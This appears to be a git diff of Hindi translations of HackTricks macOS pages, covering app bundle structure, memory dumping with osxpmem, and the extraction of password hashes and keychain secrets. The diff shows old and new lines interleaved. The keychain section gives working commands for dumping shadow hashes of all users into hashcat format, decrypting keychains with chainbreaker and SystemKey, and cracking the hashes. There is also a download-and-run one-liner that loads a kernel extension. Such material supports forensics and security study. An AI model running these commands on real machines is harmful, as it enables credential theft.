यह खोज डायरेक्टरी जैसे `_CodeSignature`, `MacOS`, `Resources`, और फ़ाइलें जैसे `Info.plist` को प्रकट करती है, जो प्रत्येक एक अलग उद्देश्य से सुरक्षित एप्लिकेशन से लेकर उसके उपयोगकर्ता इंटरफ़ेस और परिचालन पैरामीटरों को परिभाषित करने में मदद करती है।
**एप्लिकेशन के बाइनरी का नाम** शामिल करता है (Contents/MacOS में पाया जाता है)।
#### अतिरिक्त बंडल डायरेक्टरी
* **CFBundleIdentifier**
सामान्य डायरेक्टरियों के अलावा, बंडल्स में निम्नलिखित भी शामिल हो सकते हैं:
एप्लिकेशन के बंडल आइडेंटिफ़ायर को शामिल करता है (अक्सर सिस्टम द्वारा एप्लिकेशन की **वैश्विक** **पहचान** करने के लिए इस्तेमाल किया जाता है)।
- **Frameworks**: एप्लिकेशन द्वारा उपयोग किए जाने वाले बंडल फ़्रेमवर्क्स को संग्रहित करता है।
- **PlugIns**: एक डायरेक्टरी जो एप्लिकेशन की क्षमताएँ बढ़ाने वाले प्लगइन और एक्सटेंशन के लिए है।
- **XPCServices**: एप्लिकेशन द्वारा प्रक्रिया के बाहर संचार के लिए उपयोग किए जाने वाले XPC सेवाएँ को धारित करता है।
* **LSMinimumSystemVersion**
यह संरचना सुनिश्चित करती है कि सभी आवश्यक घटक बंडल के भीतर समाहित हों, जो एक मॉड्यूलर और सुरक्षित एप्लिकेशन वातावरण को सुविधाजनक बनाती है।
**macOS के सबसे पुराने** **संस्करण** को शामिल करता है जिसके साथ एप्लिकेशन संगत है।
अधिक विस्तृत जानकारी के लिए `Info.plist` कुंजियों और उनके अर्थों पर, Apple डेवलपर दस्तावेज़ीकरण व्यापक संसाधन प्रदान करता है: [Apple Info.plist Key Reference](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html).
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
Other ways to support HackTricks:
HackTricks का समर्थन करने के अन्य तरीके:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* यदि आप अपनी कंपनी का विज्ञापन **HackTricks** में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** ट्विटर पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>

View file

@ -2,34 +2,41 @@
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा **पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
</details>
## मेमोरी आर्टिफैक्ट्स
### स्वैप फाइल्स
### स्वैप फ़ाइलें
* **`/private/var/vm/swapfile0`**: यह फाइल **कैश के रूप में इस्तेमाल होती है जब भौतिक मेमोरी भर जाती है**। भौतिक मेमोरी में डेटा को स्वैपफाइल में धकेला जाता है और फिर जरूरत पड़ने पर भौतिक मेमोरी में वापस स्वैप किया जाता है। यहां एक से अधिक फाइलें मौजूद हो सकती हैं। उदाहरण के लिए, आप swapfile0, swapfile1, आदि देख सकते हैं।
* **`/private/var/vm/sleepimage`**: जब OS X **हाइबरनेशन** में जाता है, **मेमोरी में संग्रहित डेटा को sleepimage फाइल में डाल दिया जाता है**। जब उपयोगकर्ता वापस आता है और कंप्यूटर को जगाता है, मेमोरी को sleepimage से पुनर्स्थापित किया जाता है और उपयोगकर्ता वहीं से शुरू कर सकता है जहां वह छोड़ा था।
स्वैप फ़ाइलें, जैसे `/private/var/vm/swapfile0`, **जब फिजिकल मेमोरी भर जाती है तो कैश के रूप में काम करती हैं**। जब फिजिकल मेमोरी में और जगह नहीं होती, तो उसका डेटा एक स्वैप फ़ाइल में स्थानांतरित किया जाता है और फिर आवश्यकतानुसार फिजिकल मेमोरी में वापस लाया जाता है। एक से अधिक स्वैप फ़ाइलें मौजूद हो सकती हैं, जिनके नाम हो सकते हैं swapfile0, swapfile1, आदि।
आधुनिक MacOS सिस्टम्स में डिफ़ॉल्ट रूप से यह फाइल एन्क्रिप्टेड होगी, इसलिए यह पुनर्प्राप्त नहीं हो सकती है।
### हाइबर्नेट इमेज
* हालांकि, इस फाइल का एन्क्रिप्शन अक्षम किया जा सकता है। `sysctl vm.swapusage` का आउटपुट चेक करें
`/private/var/vm/sleepimage` पर स्थित फ़ाइल **हाइबर्नेशन मोड** के दौरान महत्वपूर्ण है। **OS X को हाइबर्नेट करते समय मेमोरी से डेटा इस फ़ाइल में स्टोर किया जाता है**। कंप्यूटर को जागने पर, सिस्टम इस फ़ाइल से मेमोरी डेटा प्राप्त करता है, जिससे उपयोगकर्ता जहाँ छोड़ा था वहाँ जारी रख सकता है
### osxpmem के साथ मेमोरी डंपिंग
यह ध्यान देने योग्य है कि आधुनिक MacOS सिस्टमों पर, सुरक्षा कारणों से इस फ़ाइल को सामान्यत: एन्क्रिप्ट किया जाता है, जिससे पुनर्प्राप्ति कठिन होती है।
* यदि स्लीपइमेज के लिए एन्क्रिप्शन सक्षम है या नहीं यह जांचने के लिए, कमांड `sysctl vm.swapusage` चलाया जा सकता है। यह दिखाएगा कि क्या फ़ाइल एन्क्रिप्ट की गई है।
### मेमोरी दबाव लॉग
MacOS सिस्टम में एक और महत्वपूर्ण मेमोरी संबंधित फ़ाइल है **मेमोरी दबाव लॉग**। ये लॉग `/var/log` में स्थित होते हैं और सिस्टम के मेमोरी उपयोग और दबाव घटनाओं के बारे में विस्तृत जानकारी शामिल करते हैं। ये मेमोरी संबंधित मुद्दों का निदान करने या समय के साथ सिस्टम के मेमोरी का प्रबंधन कैसे करता है इसको समझने के लिए विशेष रूप से उपयोगी हो सकते हैं।
## osxpmem के साथ मेमोरी डंपिंग
MacOS मशीन में मेमोरी डंप करने के लिए आप [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip) का उपयोग कर सकते हैं।
**नोट**: निम्नलिखित निर्देश केवल Intel आर्किटेक्चर वाले Macs के लिए काम करेंगे। यह टूल अब आर्काइव्ड है और अंतिम रिलीज 2017 में हुई थी। नीचे दिए गए निर्देशों का उपयोग करके डाउनलोड किया गया बाइनरी Intel चिप्स के लिए लक्षित है क्योंकि 2017 में Apple Silicon मौजूद नहीं था। arm64 आर्किटेक्चर के लिए बाइनरी को कंपाइल करना संभव हो सकता है लेकिन आपको खुद ही कोशिश करनी होगी।
**ध्यान दें**: निम्नलिखित निर्देश केवल इंटेल आर्किटेक्चर वाले Macs के लिए काम करेंगे। यह टूल अब संग्रहीत है और अंतिम रिलीज 2017 में हुआ था। नीचे दिए गए निर्देशों का उपयोग करके डाउनलोड किया गया बाइनरी इंटेल चिप्स को लक्ष्य बनाता है क्योंकि 2017 में Apple Silicon मौजूद नहीं था। यह संभावना है कि arm64 आर्किटेक्चर के लिए बाइनरी को कंपाइल करना संभव है, लेकिन आपको खुद प्रयास करना होगा
```bash
#Dump raw format
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
@ -37,32 +44,32 @@ sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
#Dump aff4 format
sudo osxpmem.app/osxpmem -o /tmp/dump_mem.aff4
```
यदि आपको यह त्रुटि मिलती है: `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` आप इसे ठीक कर सकते हैं:
यदि आपको यह त्रुटि मिलती है: `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` तो आप इसे ठीक कर सकते हैं:
```bash
sudo cp -r osxpmem.app/MacPmem.kext "/tmp/"
sudo kextutil "/tmp/MacPmem.kext"
#Allow the kext in "Security & Privacy --> General"
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
```
**अन्य त्रुटियां** को "Security & Privacy --> General" में **kext को लोड करने की अनुमति देकर** ठीक किया जा सकता है, बस इसे **अनुमति दें**
**अन्य त्रुटियाँ** को "सुरक्षा और गोपनीयता --> सामान्य" में **kext को लोड करने की अनुमति देने** से ठीक किया जा सकता है, बस **अनुमति** दें।
आप इस **oneliner** का उपयोग करके एप्लिकेशन डाउनलोड करने, kext को लोड करने और मेमोरी डंप करने के लिए भी कर सकते हैं:
{% code overflow="wrap" %}
आप इस **वनलाइनर** का उपयोग करके एप्लिकेशन डाउनलोड कर सकते हैं, kext लोड कर सकते हैं और मेमोरी डंप कर सकते हैं:
```bash
sudo su
cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip; unzip osxpmem-2.1.post4.zip; chown -R root:wheel osxpmem.app/MacPmem.kext; kextload osxpmem.app/MacPmem.kext; osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
```
{% endcode %}
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details>

View file

@ -2,47 +2,42 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** ट्विटर पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
## पासवर्ड
### शैडो पासवर्ड
### छाया पासवर्ड
शैडो पासवर्ड **`/var/db/dslocal/nodes/Default/users/`** में स्थित plists में उपयोगकर्ता के कॉन्फ़िगरेशन के साथ संग्रहीत होता है।\
निम्नलिखित oneliner का उपयोग **सभी उपयोगकर्ताओं के बारे में जानकारी** (हैश जानकारी सहित) डंप करने के लिए किया जा सकता है:
छाया पासवर्ड उपयोगकर्ता के विन्यास के साथ **`/var/db/dslocal/nodes/Default/users/`** में स्थित plists में संग्रहीत होता है।\
निम्नलिखित वनलाइनर का उपयोग किया जा सकता है **सभी उपयोगकर्ताओं के बारे में सभी जानकारी को डंप करने** के लिए (हैश जानकारी सहित):
{% code overflow="wrap" %}
```bash
for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done
```
```bash
dscl . list /Users | grep -v '^_' | while read user; do echo -n "$user:"; dscl . -read /Users/$user dsAttrTypeNative:ShadowHashData | tr -d ' ' | cut -d '[' -f2 | cut -d ']' -f1 | xxd -r -p | base64; echo; done
```
{% endcode %}
[**इस तरह की स्क्रिप्ट्स**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) या [**यह वाली**](https://github.com/octomagon/davegrohl.git) का उपयोग करके हैश को **hashcat** **प्रारूप** में परिवर्तित किया जा सकता है।
[**इस तरह के स्क्रिप्ट**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) या [**यह एक**](https://github.com/octomagon/davegrohl.git) का उपयोग **हैश** को **हैशकैट** **स्वरूप** में बदलने के लिए किया जा सकता है।
सभी गैर-सेवा खातों के क्रेडेंशियल्स को hashcat प्रारूप `-m 7100` (macOS PBKDF2-SHA512) में डंप करने के लिए एक वैकल्पिक वन-लाइनर:
एक वैकल्पिक वन-लाइनर जो सभी गैर-सेवा खातों के क्रेडेंशियल को हैशकैट स्वरूप में डंप करेगा `-m 7100` (macOS PBKDF2-SHA512):
{% code overflow="wrap" %}
```bash
sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex "[^_]*"); do plutil -extract name.0 raw $i | awk "{printf \$0\":\$ml\$\"}"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk "{printf \"$\"\$0}"; fi; done; echo ""; done'
```
{% endcode %}
### कीचेन डंप
### Keychain Dump
ध्यान दें कि security बाइनरी का उपयोग करते समय **पासवर्ड्स को डिक्रिप्टेड करके डंप करने** के लिए, कई प्रॉम्प्ट्स उपयोगकर्ता से इस ऑपरेशन की अनुमति मांगेंगे।
ध्यान दें कि सुरक्षा बाइनरी का उपयोग करके **पासवर्ड डिक्रिप्ट करने के लिए** कई प्रॉम्प्ट उपयोगकर्ता से इस ऑपरेशन की अनुमति देने के लिए पूछेगा।
```bash
#security
secuirty dump-trust-settings [-s] [-d] #List certificates
@ -54,42 +49,44 @@ security dump-keychain -d #Dump all the info, included secrets (the user will be
### [Keychaindump](https://github.com/juuso/keychaindump)
{% hint style="danger" %}
इस टिप्पणी के आधार पर [juuso/keychaindump#10 (टिप्पणी)](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) ऐसा लगता है कि ये उपकरण Big Sur में अब काम नहीं कर रहे हैं।
इस टिप्पणी के आधार पर [juuso/keychaindump#10 (comment)](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) यह लगता है कि ये उपकरण अब बिग सर में काम नहीं कर रहे हैं।
{% endhint %}
हमलावर को अभी भी सिस्टम तक पहुँचने की जरूरत है और **keychaindump** चलाने के लिए **root** विशेषाधिकारों तक बढ़ाना होगा। इस दृष्टिकोण में अपनी शर्तें हैं। जैसा कि पहले उल्लेख किया गया है, **लॉगिन पर आपका कीचेन डिफ़ॉल्ट रूप से अनलॉक हो जाता है** और जब आप अपने सिस्टम का उपयोग करते हैं तो अनलॉक रहता है। यह सुविधा के लिए है ताकि उपयोगकर्ता को हर बार जब एक एप्लिकेशन कीचेन तक पहुँचना चाहता है तो उसे अपना पासवर्ड दर्ज नहीं करना पड़े। अगर उपयोगकर्ता ने इस सेटिंग को बदल दिया है और हर उपयोग के बाद कीचेन को लॉक करने का चुनाव किया है, तो keychaindump अब काम नहीं करेगा; यह एक अनलॉक कीचेन पर निर्भर करता है ताकि काम कर सके।
### Keychaindump Overview
Keychaindump कैसे पासवर्ड को मेमोरी से निकालता है यह समझना महत्वपूर्ण है। इस लेन-देन में सबसे महत्वपूर्ण प्रक्रिया ”**securityd**“ **प्रक्रिया** है। Apple इस प्रक्रिया को **प्राधिकरण और क्रिप्टोग्राफिक ऑपरेशनों के लिए एक सुरक्षा संदर्भ डेमन** के रूप में संदर्भित करता है। Apple डेवलपर लाइब्रेरीज़ इसके बारे में बहुत कुछ नहीं बताती हैं; हालांकि, वे हमें बताते हैं कि securityd कीचेन तक पहुँच को संभालता है। अपने शोध में, Juuso कीचेन को डिक्रिप्ट करने के लिए जरूरी कुंजी को ”The Master Key“ के रूप में संदर्भित करता है। इस कुंजी को प्राप्त करने के लिए कई कदम उठाने की जरूरत है क्योंकि यह उपयोगकर्ता के OS X लॉगिन पासवर्ड से निकाला जाता है। अगर आप कीचेन फाइल को पढ़ना चाहते हैं तो आपके पास यह मास्टर कुंजी होनी चाहिए। इसे प्राप्त करने के लिए निम्नलिखित कदम किए जा सकते हैं। **securityd के हीप का स्कैन करें (keychaindump यह vmmap कमांड के साथ करता है)**। संभावित मास्टर कुंजियाँ MALLOC\_TINY के रूप में चिह्नित क्षेत्र में संग्रहीत होती हैं। आप इन हीप्स के स्थानों को निम्नलिखित कमांड के साथ स्वयं देख सकते हैं:
एक उपकरण जिसे **keychaindump** नाम से विकसित किया गया है, मैकओएस की कीचेन से पासवर्ड निकालने के लिए है, लेकिन नए मैकओएस संस्करणों जैसे बिग सर पर सीमाएं हैं, जैसा कि एक [चर्चा](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) में इंगित किया गया है। **keychaindump** का उपयोग अटैकर को **रूट** तक पहुंचने और वर्चस्व को बढ़ाने की आवश्यकता है। यह उपकरण उस तथ्य का शोषण करता है कि कीचेन डिफ़ॉल्ट रूप से उपयोगकर्ता लॉगिन के बाद अनलॉक होता है ताकि अनुकूलता के लिए, एप्लिकेशन को उपयोक्ता के पासवर्ड को बार-बार नहीं मांगने की आवश्यकता न हो। हालांकि, अगर एक उपयोक्ता हर उपयोग के बाद अपनी कीचेन को लॉक करने का विकल्प चुनता है, तो **keychaindump** अप्रभावी हो जाता है।
**Keychaindump** एक विशेष प्रक्रिया को लक्ष्य बनाकर काम करता है जिसे **securityd** कहा जाता है, जिसे Apple ने अधिकृति और गणितीय कार्यों के लिए डेमन के रूप में वर्णित किया है, जो कीचेन तक पहुंचने के लिए महत्वपूर्ण है। निकालने की प्रक्रिया में उपयोगकर्ता के लॉगिन पासवर्ड से निकली एक **मास्टर की** की पहचान करना शामिल है। यह कुंजी कीचेन फ़ाइल को पढ़ने के लिए आवश्यक है। **keychaindump** उपयोगकर्ता के लॉगिन पासवर्ड से निकली एक **मास्टर की** की खोज करता है, **keychaindump** `vmmap` कमांड का उपयोग करके **securityd** की मेमोरी हीप को स्कैन करता है, `MALLOC_TINY` के रूप में झंझट किए गए क्षेत्रों में संभावित कुंजियों की खोज करता है। इन मेमोरी स्थानों की जांच के लिए निम्नलिखित कमांड का उपयोग किया जाता है:
```bash
sudo vmmap <securityd PID> | grep MALLOC_TINY
```
**Keychaindump** तब वापस आए हीप्स में 0x0000000000000018 की घटनाओं की खोज करेगा। अगर अगला 8-बाइट मान वर्तमान हीप की ओर इशारा करता है, तो हमने एक संभावित मास्टर की पाई है। यहाँ से थोड़ा डिओब्फस्केशन अभी भी होना आवश्यक है जो सोर्स कोड में देखा जा सकता है, लेकिन एक विश्लेषक के रूप में सबसे महत्वपूर्ण बात यह है कि इस जानकारी को डिक्रिप्ट करने के लिए आवश्यक डेटा securityd की प्रोसेस मेमोरी में संग्रहीत होता है। यहाँ keychain dump आउटपुट का एक उदाहरण है।
उम्मीदवार मास्टर कुंजियों की संभावित कुंजियों की पहचान के बाद, **keychaindump** विशेष पैटर्न (`0x0000000000000018`) के लिए हीप्स के माध्यम से खोज करता है जो मास्टर कुंजी के लिए उम्मीदवार को दर्शाता है। इस कुंजी का उपयोग करने के लिए और भी कदम आवश्यक है, जैसा कि **keychaindump** के स्रोत कोड में विस्तार से वर्णित है। इस क्षेत्र पर ध्यान केंद्रित विश्लेषकों को ध्यान देना चाहिए कि कुंजीचैन को डिक्रिप्ट करने के लिए महत्वपूर्ण डेटा **securityd** प्रक्रिया की मेमोरी में संग्रहित है। **keychaindump** चलाने के लिए एक उदाहरण कमांड है:
```bash
sudo ./keychaindump
```
### chainbreaker
### चेनब्रेकर
[**Chainbreaker**](https://github.com/n0fate/chainbreaker) का उपयोग निम्नलिखित प्रकार की जानकारी को OSX keychain से फोरेंसिक रूप से सही तरीके से निकालने के लिए किया जा सकता है:
[**Chainbreaker**](https://github.com/n0fate/chainbreaker) का उपयोग एक फोरेंसिक तरीके से OSX कीचेन से निम्नलिखित प्रकार की जानकारी निकालने के लिए किया जा सकता है:
* हैश्ड Keychain पासवर्ड, [hashcat](https://hashcat.net/hashcat/) या [John the Ripper](https://www.openwall.com/john/) के साथ क्रैकिंग के लिए उपयुक्त
* हैश वाला Keychain पासवर्ड, [hashcat](https://hashcat.net/hashcat/) या [John the Ripper](https://www.openwall.com/john/) के साथ क्रैकिंग के लिए उपयुक्त
* इंटरनेट पासवर्ड
* जेनेरिक पासवर्ड
* प्राइवेट कीज़
* पब्लिक कीज़
* X509 सर्टिफिकेट्स
* सिक्योर नोट्स
* Appleshare पासवर्ड
* निजी कुंजी
* सार्वजनिक कुंजी
* X509 प्रमाणपत्र
* सुरक्षित नोट्स
* एप्पलशेयर पासवर्ड
Keychain अनलॉक पासवर्ड, [volafox](https://github.com/n0fate/volafox) या [volatility](https://github.com/volatilityfoundation/volatility) का उपयोग करके प्राप्त मास्टर की, या SystemKey जैसी अनलॉक फाइल दी गई हो, तो Chainbreaker प्लेनटेक्स्ट पासवर्ड भी प्रदान करेगा।
Keychain अनलॉक पासवर्ड, [volafox](https://github.com/n0fate/volafox) या [volatility](https://github.com/volatilityfoundation/volatility) से प्राप्त मास्टर कुंजी, या SystemKey जैसा एक अनलॉक फ़ाइल के साथ, चेनब्रेकर भी प्लेनटेक्स्ट पासवर्ड प्रदान करेगा।
इनमें से किसी भी तरीके से Keychain को अनलॉक किए बिना, Chainbreaker सभी अन्य उपलब्ध जानकारी दिखाएगा।
इनमें से किसी एक तरीके से Keychain को अनलॉक किया बिना, चेनब्रेकर सभी अन्य उपलब्ध जानकारी प्रदर्शित करेगा।
### **Dump keychain keys**
#### **Keychain कुंजियों को डंप करें**
```bash
#Dump all keys of the keychain (without the passwords)
python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain
```
### **SystemKey के साथ keychain कुंजियों (पासवर्ड के साथ) का डंप**
#### **सिस्टमकी के साथ कीचेन कुंजी (साथ में पासवर्ड) डंप करें**
```bash
# First, get the keychain decryption key
# To get this decryption key you need to be root and SIP must be disabled
@ -97,7 +94,7 @@ hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo
## Use the previous key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
```
### **कीचेन कुंजियों को डंप करना (पासवर्ड के साथ) हैश को क्रैक करना**
#### **कुंजीथल कुंजी (साथ में पासवर्ड) को डंप करें हैश को क्रैक करें**
```bash
# Get the keychain hash
python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain
@ -106,9 +103,9 @@ hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt
# Use the key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
```
### **मेमोरी डंप के साथ keychain कुंजियों (पासवर्ड के साथ) को डंप करें**
#### **मेमोरी डंप के साथ कीचेन कुंजी (पासवर्ड के साथ) डंप करें**
